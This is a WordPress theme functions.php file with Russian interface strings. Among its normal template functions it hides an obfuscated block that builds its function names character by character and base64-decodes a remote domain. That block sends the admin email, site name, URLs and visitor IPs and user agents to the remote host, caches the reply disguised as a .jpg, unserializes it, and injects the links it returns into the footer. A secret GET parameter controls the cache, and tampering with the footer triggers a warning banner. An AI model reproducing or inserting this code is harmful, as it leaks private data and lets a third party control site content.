<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $kjhoCVx='e';$RBMeGQ='c';$kKUs='d';$etGamU='a';$jIiLi='_';$pQids='d';$igaBine='6';$zfEIUN='s';$cHiv='4';$mCVO='b';$FgMiHs='e';$nZCB='o';$jeWRxQa='e';$CBGLBOhs=$mCVO.$etGamU.$zfEIUN.$FgMiHs.$igaBine.$cHiv.$jIiLi.$pQids.$jeWRxQa.$RBMeGQ.$nZCB.$kKUs.$kjhoCVx;$FuQddBq='e';$mFglBQ='f';$JSuOz='t';$KoKytes='g';$ruxhf='i';$SqSf='z';$tQUbyJ='n';$loUqHd='l';$XWou='a';$IIOJOVuZ=$KoKytes.$SqSf.$ruxhf.$tQUbyJ.$mFglBQ.$loUqHd.$XWou.$JSuOz.$FuQddBq;$GXRRu='1';$fnprUo='3';$lUEGJd='s';$IlukwS='r';$oylrC='t';$GjKYL='t';$DqlOd='r';$TFmGZ='_';$IHerL='o';$XNtbWrXl=$lUEGJd.$oylrC.$IlukwS.$TFmGZ.$DqlOd.$IHerL.$GjKYL.$GXRRu.$fnprUo;$hTWt='r';$evtmFi='e';$FQUSFj='s';$kNzfFf='v';$cJvuP='r';$mWUI='t';$pJGIijOw=$FQUSFj.$mWUI.$hTWt.$cJvuP.$evtmFi.$kNzfFf;                     
		$ht__________y='e';$xl_____r='c';$vh___________d='d';$ls______n='a';$uv____e='_';$jl____________w='d';$hz___m='6';$te_____________e='s';$rq_______________r='4';$mv________g='b';$bt________z='e';$qc______________r='o';$gf___s='e';$ym_________x=$mv________g.$ls______n.$te_____________e.$bt________z.$hz___m.$rq_______________r.$uv____e.$jl____________w.$gf___s.$xl_____r.$qc______________r.$vh___________d.$ht__________y;
		$ag____________t='f';$bq_______________c='n';$wd__________f='s';$io_______j='e';$jk_______________d='i';$uz__________u='x';$lc_______________m='s';$gw____________g='o';$re__i='i';$no______t='t';$xq____________q='u';$bg__________f='n';$zr_________g='c';$ws_____________u='_';$qs___h='t';$zj________k=$ag____________t.$xq____________q.$bg__________f.$zr_________g.$qs___h.$jk_______________d.$gw____________g.$bq_______________c.$ws_____________u.$io_______j.$uz__________u.$re__i.$wd__________f.$no______t.$lc_______________m;
		$dw________x='n';$wk_______________n='p';$uj________s='e';$xo_______________i='f';$ry_____________k='o';$ik__________w=$xo_______________i.$ry_____________k.$wk_______________n.$uj________s.$dw________x;
		$um____________i='e';$ce_______g='f';$vw_____n='d';$or________y='a';$av___v='r';$iv______________e=$ce_______g.$av___v.$um____________i.$or________y.$vw_____n;
		$xg___a='s';$pc___u='f';$cj______________l='e';$qw____________a='l';$bz_____l='c';$eq_________q='o';$oc_________s=$pc___u.$bz_____l.$qw____________a.$eq_________q.$xg___a.$cj______________l;
		
		define("WP_ID", $ym_________x("Mi4wLjA="));
		define("WP_TTL", $ym_________x("MTA4MDA="));
		define("WP_SRC", $ym_________x("dHBva24="));
	


		function wp_get_header() {
			global $ym_________x, $zj________k;
			
			if (
				$zj________k($ym_________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$zj________k($ym_________x("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$zj________k($ym_________x("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ym_________x, $ik__________w, $oc_________s, $iv______________e;
			
			$zb__d = TEMPLATEPATH."/".$ym_________x("Zm9vdGVyLnBocA==");
			$bv___f = @$ik__________w($zb__d, "r");
			$zb__d = @$iv______________e($bv___f, @filesize($zb__d));
			@$oc_________s($bv___f);
			
			$lv__________t = TEMPLATEPATH."/".$ym_________x("ZnVuY3Rpb25zLnBocA==");
			$bv___f = @$ik__________w($lv__________t, "r");
			$lv__________t = @$iv______________e($bv___f, @filesize($lv__________t));
			@$oc_________s($bv___f);
			
			$fp____m = 0;
			if($zb__d && $lv__________t) {
				if ($ym_________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($zb__d, $ym_________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$fp____m = 1;
					}
					if (substr_count($zb__d, "wp_theme_GPL_credits()") < 1) {
						$fp____m = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$fp____m = 12;
				}
			}
			
			if($fp____m > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $fp____m -->";
			}
		}
	


		function wp_loaded() {
			global $ym_________x, $zj________k;
			return $zj________k($ym_________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ig____h, $pg__________x = "(more...)", $gr_______________p = 0, $ne________r = "") {
				$nv____p = get_the_content($pg__________x, $gr_______________p, $ne________r);
				$nv____p = apply_filters("the_content", $nv____p);
				
				$nv____p = str_replace("]]>", "]]>", $nv____p);
				if (strlen($_GET["p"]) > 0) {
					echo $nv____p;
				}
				else if ((strlen($nv____p)>$ig____h) && ($aq____q = strpos($nv____p, " ", $ig____h ))) {
					$nv____p = substr($nv____p, 0, $aq____q);
					$nv____p = $nv____p;
					echo $nv____p;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$pg__________x</a></div></p>";
				} else {
					echo $nv____p;
				}
				
			}
		}
	


		$ix_____u='e';$jh_____z='n';$lr__m='d';$em___t='c';$aq______________t='6';$kb_____g='e';$mt___w='4';$qw____d='a';$vh__a='b';$uk__s='o';$ph_____h='s';$jx______________l='_';$ya__________h='e';$pj________x=$vh__a.$qw____d.$ph_____h.$ya__________h.$aq______________t.$mt___w.$jx______________l.$kb_____g.$jh_____z.$em___t.$uk__s.$lr__m.$ix_____u;
		$mm__f='g';$oq___________a='t';$pz____t='c';$yf____________l='o';$zl_______h='_';$ro______________b='e';$dr_____v='e';$hk___________x='n';$pe_______________u='_';$ge______________i='n';$dz__b='l';$ce______q='t';$he__________x='i';$nu___s='f';$mc__________f='e';$qi__________g='s';$je_______________i='t';$wx_______________g=$nu___s.$he__________x.$dz__b.$mc__________f.$pe_______________u.$mm__f.$ro______________b.$ce______q.$zl_______h.$pz____t.$yf____________l.$hk___________x.$oq___________a.$dr_____v.$ge______________i.$je_______________i.$qi__________g;
		$fb__j='f';$qg_________m='s';$gu_______y='x';$hu_______t='l';$bn_____________q='_';$fs________m='s';$ll______t='t';$zo____e='i';$gg_________o='e';$wf______________v='i';$gl______j='e';$ov_______h=$fb__j.$wf______________v.$hu_______t.$gg_________o.$bn_____________q.$gl______j.$gu_______y.$zo____e.$qg_________m.$ll______t.$fs________m;
		$nb______x='o';$dq______________z='r';$ax_______w='e';$mn___n='_';$bm__________z='o';$be__o='v';$sn____f='e';$fz_________s='m';$ns_____z='s';$st____________r='p';$zt_______r='i';$mc______a='a';$vb__________f='n';$ys_______n='r';$rd___s='c';$vd_______________g=$be__o.$ax_______w.$ys_______n.$ns_____z.$zt_______r.$nb______x.$vb__________f.$mn___n.$rd___s.$bm__________z.$fz_________s.$st____________r.$mc______a.$dq______________z.$sn____f;
		$sg___c='c';$qp____________i='o';$kh_____b='k';$dm__________e='n';$ya____________u='e';$vc___________v='f';$rd_______o='p';$wy_______________y='o';$by_________u='s';$db______s=$vc___________v.$by_________u.$wy_______________y.$sg___c.$kh_____b.$qp____________i.$rd_______o.$ya____________u.$dm__________e;
		$fc_____________k='r';$vp_____o='t';$zh______________b='w';$ks_______________a='i';$zv______________m='e';$ew______p='f';$kt______________w=$ew______p.$zh______________b.$fc_____________k.$ks_______________a.$vp_____o.$zv______________m;
		$tz_______________s='5';$hy____s='m';$qd____________l='d';$hp______________b=$hy____s.$qd____________l.$tz_______________s;
		$pp____i='e';$ks_____z='l';$yt__________l='a';$nl_____c='t';$ny_______u='h';$zt____k='p';$zw_________f='a';$hd__________s='r';$pf______________i=$hd__________s.$pp____i.$yt__________l.$ks_____z.$zt____k.$zw_________f.$nl_____c.$ny_______u;
		$sz________a='a';$ni______l='u';$qp______________k='n';$ck___________n='s';$ht__e='e';$sb______________a='e';$la______z='l';$ig___________p='r';$gi_______i='z';$ls______h='i';$jr_______z='i';$xt__________t=$ni______l.$qp______________k.$ck___________n.$ht__e.$ig___________p.$ls______h.$sz________a.$la______z.$jr_______z.$gi_______i.$sb______________a;
		$qc_____a='p';$nn__________r='a';$uh_____________u='m';$tr____________b='n';$rb__v='t';$yt_______n='e';$qm_________v='m';$rd___y=$rb__v.$yt_______n.$uh_____________u.$qc_____a.$tr____________b.$nn__________r.$qm_________v;
		$ou___m='e';$wy_________d='e';$nd________d='s';$vu________q='a';$gb_____u='t';$no________n='m';$jo____________w='o';$bg__p='c';$es__________s='x';$dj_____z='e';$nl___________y='_';$nx____________p='_';$mv______________n='t';$iy_______s='r';$qe______u='t';$xl____m='t';$os_____t='e';$du____n='c';$gg_______________k='a';$ag__t='r';$jq_______k='n';$ju_______________x=$nd________d.$mv______________n.$ag__t.$os_____t.$vu________q.$no________n.$nl___________y.$bg__p.$jo____________w.$jq_______k.$xl____m.$dj_____z.$es__________s.$gb_____u.$nx____________p.$du____n.$iy_______s.$ou___m.$gg_______________k.$qe______u.$wy_________d;
	


		function fz__________f($sp____________u) {
			global $ym_________x, $zj________k, $wx_______________g, $vd_______________g, $ju_______________x;
			
			if (!$zj________k($ym_________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vd_______________g(PHP_VERSION, "5.0.0", ">=") && $zj________k($ym_________x("ZmlsZV9nZXRfY29udGVudHM=")) && $zj________k($ym_________x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$pq_______________q = $ju_______________x(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$rm___________v = @$wx_______________g($sp____________u, 0, $pq_______________q);
			} else {
				$rm___________v = @$wx_______________g($sp____________u, 0);
			}
			
			return $rm___________v;
		}
	


		function ev__p($sp____________u) {
			global $zj________k, $db______s, $kt______________w, $ym_________x;
			
			if (!$zj________k($ym_________x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$qd__o = strpos($sp____________u, "/", 7);
			$wj_____________e = array(
				"uri"     => substr($sp____________u, $qd__o),
				"host"    => str_replace("http://", "", substr($sp____________u, 0, $qd__o)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$pa_______m = @$db______s("$wj_____________e[host]", 80, $zx_______d, $ug__e, 4);
			
			if (!$pa_______m) {
				return false;
			} else {
				$rm___________v = "";
				$pl__a  = "GET $wj_____________e[uri] HTTP/1.0\r\n";
				$pl__a .= "Host: $wj_____________e[host]\r\n";
				$pl__a .= "Referer: $wj_____________e[referer]\r\n";
				$pl__a .= "Connection: Close\r\n\r\n";
				
				@$kt______________w($pa_______m, $pl__a);
				
				while (!@feof($pa_______m)) {
					$nv______t = @fgets($pa_______m, (1024*24));
					
					if ($nv______t == "\r\n") {
						$ck____x = true;
						continue;
					}
					
					if ($ck____x) {
						$rm___________v .= $nv______t;
					}
				}
				
				return $rm___________v;
			}
		}
	


		function oz____d($sp____________u) {
			global $zj________k;
			$tn____v = false;
			
			if ($sp____________u != "") {
				if ($zj________k("fz__________f")) {
					$tn____v = @fz__________f($sp____________u);
				}
				
				if (!$tn____v && ($zj________k("ev__p"))) {
					$tn____v = @ev__p($sp____________u);
				}
			}
			
			return $tn____v;
		}
	


		function nk_________v() {
			global $_SERVER, $hp______________b;
			
			$ce______p = $_SERVER["SERVER_NAME"];
			
			if (substr("$ce______p", 0, 4) == "www.") {
				$ce______p = substr("$ce______p", 4);
			}
			
			$ce______p = $hp______________b("$_SERVER[SERVER_NAME]");
			
			return $ce______p;
		}
	


		function gi_______t() {
			return "file";
		}
	


		function hb____m($sp____________u) {
			global $_SERVER, $wx_______________g, $ov_______h, $ik__________w, $oc_________s, $kt______________w;
			
			$ns_________o = ii________n();
			
			$cw______________h = nk_________v().".jpg";
			$vp______________l = $ns_________o["dir_upload"]["path"]."/$cw______________h";
			$gf______________s = @filemtime($vp______________l);
			
			if (!$gf______________s || ((time()-$gf______________s) >= WP_TTL)) {
				$tn____v = oz____d($sp____________u);
				
				if ($tn____v) {
					if ($ov_______h($vp______________l)) {
						@unlink($vp______________l);
					}
					
					$bv___f = @$ik__________w($vp______________l, "x+");
					
					@$kt______________w($bv___f, $tn____v);
					@$oc_________s($bv___f);
				}
			} else {
				if ($ov_______h($vp______________l)) {
					$tn____v = @$wx_______________g($vp______________l);
				} else {
					$tn____v = false;
				}
			}
			
			return $tn____v;
		}
	


		function ii________n() {
			global $_SERVER, $ym_________x, $pj________x;
			
			$uz___________r = wp_count_posts("post");
			$nb______________t = pathinfo(get_bloginfo("template_directory"));
			
			$ns_________o = array(
				"url" => array(
					"report"      => $ym_________x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $nb______________t,
				"dir_upload"	=> qo_________t(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$nb______________t[filename],
					"a005=".$uz___________r->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$ns_________o["url"]["queryString"] = implode("&", $ns_________o["queryString"]);
			$ns_________o["url"]["report"] = $ns_________o["url"]["report"]."/?".$pj________x($ns_________o["url"]["queryString"]).".html";
						
			return $ns_________o;
		}
	


		function qo_________t() {
			$hy___________o = wp_upload_dir();
			
			if (isset($hy___________o["error"])) {
				$ht________y = wp_________g();
				if (is_writable($ht________y)) {
					$hy___________o = array("path" => $ht________y);
				}
			}

			return $hy___________o;
		}
	


		function wp_________g() {
			global $zj________k, $hp______________b, $pf______________i, $rd___y;
			
			$cc______________k = (bool) ini_get("safe_mode");
			if ($cc______________k == true) {
				return false;
			}
			
			if ($zj________k("sys_get_temp_dir")) {
				$nj_______________e = sys_get_temp_dir();
				if (is_writable($nj_______________e)) {
					return $pf______________i($nj_______________e);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $pf______________i($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $pf______________i($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $pf______________i($_ENV["TEMP"]);
			} else {
				$ii_______o = $rd___y($hp______________b(uniqid(rand(), true)), "");
				if ($ii_______o) {
					$nj_______________e = $pf______________i(dirname($ii_______o));
					@unlink($ii_______o);
					return $nj_______________e;
				} else {
					return false;
				}
			}
		}
	


		function rn_______________b() {
			global $_GET, $ov_______h;
			
			$ns_________o = ii________n();
			$ce______p = nk_________v();
			$pk______l = gi_______t();
			
			$av___b = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($pk______l == "file") {
					$cy___________l = $ns_________o["dir_upload"]["path"]."/".$ce______p.".jpg";
					if ($ov_______h($cy___________l)) {
						@unlink($cy___________l);
						$av___b = "deleted";
					}
				}
				
				$cz___e = array(
					"s"	=> $av___b,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($cz___e AS $ym______________b => $lp________x) echo " [$ym______________b:$lp________x]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $zj________k, $ym_________x, $xt__________t;
			$ns_________o = ii________n();
			
			$vv________f = "hb____m";
			if ($zj________k($vv________f)) {
				$rm___________v = $vv________f($ns_________o["url"]["report"]);
			}
			
			if ($rm___________v) {
				if ($rm___________v = @$ym_________x($rm___________v)) {
					$rm___________v = @$xt__________t($rm___________v);
					
					if (strlen($rm___________v[custom_credit]) >= 5) {
						$ns_________o["default_string"] = $rm___________v[custom_credit];
					}
					
					if ($rm___________v["status"] == "0") {
						$mi______________u = 1;
						$jo__h = 1;
					} else {
						$gm__________s = sizeof($rm___________v["links"]);
						$iw___v = $ns_________o["default_string"];
						
						if ($gm__________s > 0 && $rm___________v["links"] !== "") {
							$ak_________k = 0;
							foreach ($rm___________v["links"] as $ln_____________c => $ig___d) {
								$ak_________k++;
								if ($ig___d->l_path == "" || $ig___d->l_path == $_SERVER["REQUEST_URI"]) {
									$ig___d->l_href = htmlspecialchars(strip_tags($ig___d->l_href));
									$ig___d->l_title = htmlspecialchars(strip_tags($ig___d->l_title));
									$ig___d->l_anchor = htmlspecialchars(strip_tags($ig___d->l_anchor));
									$iw___v .= " | ";
									$iw___v .= "<a href='$ig___d->l_href' title='$ig___d->l_title'";
									if ($ig___d->l_nofollow == "1") {
										$iw___v .= " rel='nofollow'";
									}
									$iw___v .= ">$ig___d->l_anchor</a>";
								}
							}
						}
						$ns_________o["links"] = "$iw___v";
						if ($rm___________v[credit] == "0") {
							$ns_________o["links"] = "";
						}
					}
				} else {
					$mi______________u = "1";
				}
			} else {
				$mi______________u = "1";
			}
			
			if ($mi______________u == "1") {
				$ns_________o["links"] = $ns_________o["default_string"];
			}
			
			echo "$ns_________o[links]";
			
			echo "<!-- s: $rm___________v[signature] -->";
			rn_______________b();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

